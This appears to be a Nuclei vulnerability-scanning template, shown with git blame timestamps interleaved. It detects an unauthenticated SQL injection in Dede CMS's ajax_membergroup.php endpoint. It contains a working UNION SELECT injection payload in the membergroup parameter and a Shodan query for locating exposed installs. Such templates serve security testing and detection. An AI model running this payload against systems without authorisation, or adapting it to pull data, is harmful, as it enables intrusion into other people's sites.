2021-03-15 08:01:47 +00:00
id : dedecms-membergroup-sqli
info :
2022-09-29 13:38:41 +00:00
name : Dede CMS - SQL Injection
2021-03-15 08:01:47 +00:00
author : pikpikcu
2022-09-29 13:38:41 +00:00
severity : critical
description : Dede CMS contains a SQL injection vulnerability which allows remote unauthenticated users to inject arbitrary SQL statements via the ajax_membergroup.php endpoint and the membergroup parameter.
2022-04-22 10:38:41 +00:00
reference :
- http://www.dedeyuan.com/xueyuan/wenti/1244.html
2022-09-29 13:38:41 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cwe-id : CWE-89
2022-07-07 10:15:54 +00:00
metadata :
shodan-query : http.html:"DedeCms"
2021-03-15 08:01:47 +00:00
tags : sqli,dedecms
2022-06-30 03:52:06 +00:00
variables :
num : "999999999"
2021-03-15 08:01:47 +00:00
requests :
- method : GET
path :
2022-06-30 03:52:06 +00:00
- "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{num}})+--+@`'`"
2021-03-15 08:01:47 +00:00
matchers-condition : and
matchers :
- type : word
words :
2022-06-30 03:52:06 +00:00
- '{{md5({{num}})}}'
2021-03-15 08:01:47 +00:00
part : body
- type : status
status :
- 200
2022-09-29 13:38:41 +00:00
# Enhanced by md on 2022/09/28